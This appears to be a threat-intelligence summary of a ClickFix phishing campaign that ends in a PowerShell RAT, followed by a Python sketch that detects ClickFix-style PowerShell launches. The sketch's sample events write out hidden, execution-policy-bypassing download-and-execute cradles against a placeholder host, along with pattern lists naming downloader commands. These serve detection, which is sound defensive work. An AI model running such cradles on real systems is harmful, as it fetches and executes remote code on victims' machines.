
From ClickFix to Command: A Full PowerShell Attack Chain

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

A targeted intrusion campaign against Israeli organizations has been identified that distributes phishing messages from compromised internal email infrastructure. The intrusion is a multi-stage, PowerShell-based infection chain that ends in the delivery of a remote access trojan (RAT). Its key characteristics are a delivery chain implemented entirely in PowerShell, obfuscated payloads, evidence of lateral movement, and possible overlap with MuddyWater campaigns. The chain begins with phishing emails that lead to a spoofed Microsoft Teams page, which uses ClickFix-style social engineering to have the victim run attacker-supplied PowerShell commands themselves. That initial command retrieves further stages, deploys the RAT, and establishes communication with a command-and-control (C2) server. The campaign shows the effectiveness of living-off-the-land techniques, layered evasion, and adaptive C2 communication.
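The summary above describes the generic shape of a ClickFix chain (a user pastes a hidden, policy-bypassing PowerShell one-liner that pulls the next stage from the network) without giving command lines or indicators. The following detection sketch is an added example written for this page, not code or IOCs from the report or from NetmanageIT: it scores Sysmon Event ID 1 style process-creation records for the features such a first-stage command usually has (hiding flags, a download cradle, an -EncodedCommand blob, a parent consistent with the Win+R Run dialog). The sample events, the host paths, the `lure.invalid` URLs and the heuristic thresholds are all constructed for the example; the parent-process assumption that a Run-dialog paste lands under explorer.exe is a general Windows observation, not something the report states.

```python
import base64
import re
from typing import Optional

# Constructed sample process-creation records (Sysmon Event ID 1 style, simplified).
# None of these come from the report; they are typical ClickFix-shaped lures written
# for this example, plus two benign PowerShell launches as negatives.


def encode_powershell_command(script: str) -> str:
    """Return the -EncodedCommand form of a script: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> Optional[str]:
    """Inverse of encode_powershell_command; None if the blob is not UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # 1. Classic ClickFix paste into Win+R: explorer.exe spawns a hidden PowerShell with a cradle.
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (iwr http://lure.invalid/s1 -UseBasicParsing).Content"'},
    # 2. Same idea, with the script hidden behind -EncodedCommand.
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": "powershell -nop -w hidden -enc " + encode_powershell_command(
         "$c=New-Object Net.WebClient;iex $c.DownloadString('http://lure.invalid/s2')")},
    # 3. Benign: a scheduled task running a local maintenance script (constructed).
    {"id": 3, "parent": r"C:\Windows\System32\svchost.exe", "image": PS_IMAGE,
     "cmdline": r"powershell -ExecutionPolicy RemoteSigned -File C:\Scripts\cleanup.ps1"},
    # 4. Benign: an interactive shell opened from Windows Terminal (constructed).
    {"id": 4, "parent": r"C:\Program Files\WindowsTerminal\WindowsTerminal.exe", "image": PS_IMAGE,
     "cmdline": "powershell.exe"},
]

# Heuristics (assumptions for this example, not indicators from the report).
HIDING_FLAGS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop(?:rofile)?\b", "no profile"),
    (r"-(?:ep|exec|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"-noni(?:nteractive)?\b", "non-interactive"),
]
DOWNLOAD_CRADLES = [
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod", "web request cmdlet"),
    (r"net\.webclient|downloadstring|downloadfile", "WebClient download"),
    (r"\bcurl\b|\bwget\b|start-bitstransfer", "other downloader"),
]
# Win+R (Run dialog) launches execute under explorer.exe, which is where a pasted
# ClickFix one-liner lands; a normal admin shell is parented by a terminal or a service.
PASTE_PARENTS = ("explorer.exe",)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def analyze_event(event: dict) -> dict:
    """Score one process-creation record; returns reasons and any decoded script."""
    cmd = event["cmdline"]
    reasons = []
    decoded = None
    m = ENCODED_RE.search(cmd)
    if m:
        decoded = decode_powershell_command(m.group(1))
        reasons.append("encoded command" + ("" if decoded else " (undecodable)"))
    # Match patterns against the visible command line and the decoded script together,
    # so -EncodedCommand does not hide the cradle from the regexes.
    text = cmd + ("\n" + decoded if decoded else "")
    for pattern, label in HIDING_FLAGS + DOWNLOAD_CRADLES:
        if re.search(pattern, text, re.I):
            reasons.append(label)
    cradle = any(re.search(p, text, re.I) for p, _ in DOWNLOAD_CRADLES)
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in PASTE_PARENTS:
        reasons.append(f"spawned by {parent} (consistent with a Run-dialog paste)")
    return {"id": event["id"], "score": len(reasons), "cradle": cradle,
            "reasons": reasons, "decoded": decoded}


def is_clickfix_candidate(result: dict) -> bool:
    """A cradle plus at least two more suspicious features is worth an analyst's look."""
    return result["cradle"] and result["score"] >= 3


def find_clickfix_candidates(events: list) -> list:
    """Return the ids of events that look like a ClickFix first stage."""
    return [r["id"] for r in map(analyze_event, events) if is_clickfix_candidate(r)]


if __name__ == "__main__":
    for r in map(analyze_event, SAMPLE_EVENTS):
        flag = "SUSPECT" if is_clickfix_candidate(r) else "ok     "
        print(flag, r["id"], r["score"], "; ".join(r["reasons"]))
        if r["decoded"]:
            print("        decoded:", r["decoded"])
```

The thresholds are deliberately loose: a real deployment would feed the same features into a SIEM rule alongside ScriptBlockLogging (Event ID 4104) and a clipboard-paste signal from the browser, and would tune the parent-process list to the organization's own baseline. The point the summary makes, that the whole chain is PowerShell, is also why decoding -EncodedCommand before pattern matching matters: the cradle is often only visible in the decoded script.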

OPENCTI LABELS :

powershell,rat,phishing,social engineering,lateral movement,obfuscation,c2 communication,israeli targets,powershell rat



